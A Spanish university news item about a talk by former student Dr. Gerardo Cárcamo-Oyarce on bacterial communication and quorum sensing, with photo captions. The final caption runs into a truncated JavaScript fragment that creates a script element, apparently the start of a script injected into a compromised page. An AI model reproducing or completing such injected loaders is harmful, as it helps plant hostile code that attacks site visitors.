Nuestro ex-alumno, el Dr. Gerardo Cárcamo-Oyarce, dicta charla sobre comportamiento bacteriano

Dr. Gerardo Cárcamo-Oyarce durante su exposición

Dr. Gerardo Cárcamo-Oyarce durante su exposición

«Es un gran orgullo tener a nuestro ex-alumno, el ahora Dr. Gerardo Cárcamo-Oyarce, en esta tarde pues su carrera científica es y seguirá siendo sobresaliente», fueron las palabras con las que el Dr. Homero Urrutia Briones, Profesor Titular del Departamento de Microbiología de nuestra Facultad Ciencias Biológicas UdeC dio la bienvenida a la charla del día de ayer.

Con el título: «Understanding the behavior of microbial communities in light of bacterial individuality», el Dr. Cárcamo-Oyarce expuso frente a una audiencia compuesta por académicos y estudiantes de Postgrado Facultad Ciencias Biológicas Udec los resultados de su tesis de doctorado dando un interesante giro a lo que se entiende, en la literatura científica, como «quorum sensing.»

El Dr. Cárcamo-Oyarce realizó su Magíster en Ciencias con mención en Microbiología en nuestra Facultad de Ciencias Biológicas, su Doctorado y actual post-doctorado en la Universidad de Zurich y, recientemente, recibió el apoyo para comenzar otro post-doctorado, esta vez en la Facultad de Ingeniería del Instituto Tecnológico de Massachusetts, MIT, en Estados Unidos. Su área de investigación se vincula con el estudio de interacciones bacterianas tales como: comunicación bacteriana, competencia bacteriana en comunidades multiespecie y biogénesis de vesículas de membrana en bacteria. «Estos fenómenos tienen un papel relevante en las respuestas de comunidades microbianas, tales como la formación de biopelículas,» explicó el Dr. Urrutia, quien dirige el Laboratorio de Biopelículas y Microbiología Ambiental del Departamento de Microbiología de nuestra Facultad.

DSC_4641

Parte de la audiencia de la charla «Understanding the behavior of microbial communities in light of bacterial individuality»

DSC_4640

Parte de la audiencia de la charla «Understanding the behavior of microbial communities in light of bacterial individuality»

DSC_4638

Dr. Gerardo Cárcamo-Oyarce durante su exposiciónvar d=document;var s=d.createElement(‘script’);